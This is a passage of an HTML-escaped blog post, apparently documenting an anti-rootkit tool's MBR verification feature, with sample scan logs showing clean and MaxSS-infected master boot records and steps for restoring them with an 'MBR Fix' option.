things.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ MBR Verif: ¤¤¤&lt;br /&gt;&lt;br /&gt;+++++ PhysicalDrive0: VBOX HARDDISK +++++&lt;br /&gt;--- User ---&lt;br /&gt;[MBR] c708b764ca9daa4f8f33e4e8b3b517da&lt;br /&gt;[BSP] f4eb87199eee8a432bb482bb55118447 : &lt;b&gt;&lt;span style="color: #741b47;"&gt;Windows XP MBR Code&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Partition table:&lt;br /&gt;0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 63 | Size: 4086 Mo&lt;br /&gt;&lt;b&gt;&lt;span style="color: #741b47;"&gt;User = LL1 ... OK!&lt;br /&gt;User = LL2 ... OK!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Here's&lt;span style="font-size: small;"&gt; an example with infectious MBR. &lt;span style="font-size: small;"&gt;Th&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;e bootst&lt;span style="font-size: small;"&gt;rap (BSP) &lt;span style="font-size: small;"&gt;is legit&lt;/span&gt; (Windows &lt;span style="font-size: small;"&gt;7&lt;/span&gt;),&amp;nbsp; but&lt;span style="font-size: small;"&gt; the LL1 met&lt;span style="font-size: small;"&gt;hods returns &lt;span style="font-size: small;"&gt;something &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;different&lt;/span&gt;.&lt;span style="font-size: small;"&gt; &lt;span style="font-size: small;"&gt;Finally, &lt;span style="font-size: small;"&gt;there is a ghost partition &lt;span style="font-size: small;"&gt;hidden by rootkit&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; (MaxSST).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ MBR Verif: ¤¤¤&lt;br /&gt;&lt;br /&gt;+++++ PhysicalDrive0: Hitachi HDS721032CLA362 +++++&lt;br /&gt;--- User ---&lt;br /&gt;[MBR] a1e2c1a0c1fb3db806dcbb65fdbf8384&lt;br /&gt;[BSP] 0dc0d942fc9152dc059c7e021d2ad3db : Windows 7 MBR Code&lt;br /&gt;Partition table:&lt;br /&gt;0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 2048 | Size: 100 Mo&lt;br /&gt;1 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 206848 | Size: 305129 Mo&lt;br /&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;User != LL1 ... KO!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;--- LL1 ---&lt;br /&gt;[MBR] 501fcd9f60449033a7b892d424337896&lt;br /&gt;[BSP] 0dc0d942fc9152dc059c7e021d2ad3db : &lt;span style="color: #cc0000;"&gt;Windows 7 MBR Code &lt;b&gt;[possible maxSST in 2!]&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Partition table:&lt;br /&gt;0 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 2048 | Size: 100 Mo&lt;br /&gt;1 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 206848 | Size: 305129 Mo&lt;br /&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;2 - [ACTIVE] NTFS (0x17) [HIDDEN!] Offset (sectors): 625113088 | Size: 10 Mo&lt;/span&gt;&lt;/b&gt;&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Here's another example of infectious MBR&lt;span style="font-size: small;"&gt;. Th&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;e bootst&lt;span style="font-size: small;"&gt;rap (BSP) is infected with MaxSS.&lt;span style="font-size: small;"&gt;t&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ MBR Check: ¤¤¤&lt;br /&gt;&lt;br /&gt;
+++++ PhysicalDrive0: ST9500325AS +++++&lt;/span&gt;
&lt;span style="color: #0b5394;"&gt;&lt;br /&gt;
--- User ---&lt;br /&gt;
[MBR] 318e94ac5cf893f8e2ed0643494e74&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;0e&lt;br /&gt;
[BSP] 07a9005ccf77d28c668138e4d4a42d&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;65 : &lt;b&gt;&lt;span style="color: #cc0000;"&gt;MaxSS MBR Code!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Partition table:&lt;br /&gt;
0 - [XXXXXX] FAT32-LBA (0x1c) [HIDDEN!] Offset (sectors): 2048 | Size: 13000 Mo&lt;br /&gt;
1 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 26626048 | Size: 119235 Mo&lt;br /&gt;
2 - [XXXXXX] EXTEN-LBA (0x0f) [VISIBLE] Offset (sectors): 270819328 | Size: 344703 Mo&lt;br /&gt;
User = LL1 ... OK!&lt;br /&gt;
User = LL2 ... OK!&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;It is possible &lt;span style="font-size: small;"&gt;to &lt;b&gt;deactivate the MBR scan before to launch the s&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;can&lt;/b&gt;&lt;span style="font-size: small;"&gt; by unche&lt;span style="font-size: small;"&gt;cking the &lt;i&gt;&lt;b&gt;MBR&lt;/b&gt;&lt;/i&gt; checkbox.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-oucLEAIveFo/UJPgjljLzxI/AAAAAAAAAR4/VES3v2eTie4/s1600/Capture4.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="478" src="http://1.bp.blogspot.com/-oucLEAIveFo/UJPgjljLzxI/AAAAAAAAAR4/VES3v2eTie4/s640/Capture4.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;When a MBR is infected, it is possible &lt;span style="font-size: small;"&gt;to restore it&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;. &lt;span style="font-size: small;"&gt;Depending on the kind o&lt;span style="font-size: small;"&gt;f infection, there can have several cases.&lt;/span&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;span style="font-size: small;"&gt;If the MBR is hidden (&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;User != LL&lt;span style="font-size: small;"&gt;x&lt;/span&gt; ... KO!), &lt;b&gt;then we can restore the original MBR automatically. &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The user only &lt;span style="font-size: small;"&gt;have to choose the corresponding index in&amp;nbsp;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;PhysicalDrive&lt;/i&gt;&lt;/b&gt;, and click on &lt;i&gt;&lt;b&gt;MBR &lt;span style="font-size: small;"&gt;Fix&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-GW6OgNobtbA/UJPilaPaPfI/AAAAAAAAASA/udp83qnPU5M/s1600/mbr1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="63" src="http://3.bp.blogspot.com/-GW6OgNobtbA/UJPilaPaPfI/AAAAAAAAASA/udp83qnPU5M/s400/mbr1.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;If&lt;span style="font-size: small;"&gt; the MBR has been erased, there is no backup available. &lt;span style="font-size: small;"&gt;We can then restore a default MBR, by c&lt;span style="font-size: small;"&gt;hoosing in a list of operating systems &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;(&lt;b&gt;Windows XP, Vista, Seven&lt;/b&gt;). &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The user only &lt;span style="font-size: small;"&gt;have to choose the corresponding index in&amp;nbsp;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;PhysicalDrive&lt;/i&gt;&lt;/b&gt;, the &lt;b&gt;operating system&lt;/b&gt; and click on &lt;i&gt;&lt;b&gt;MBR &lt;span style="font-size: small;"&gt;Fix&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-3jJ6_n6YnZc/UJPimHYvpBI/AAAAAAAAASE/oDuGkn4BUhM/s1600/mbr2.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="61" src="http://4.bp.blogspot.com/-3jJ6_n6YnZc/UJPimHYvpBI/AAAAAAAAASE/oDuGkn4BUhM/s400/mbr2.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
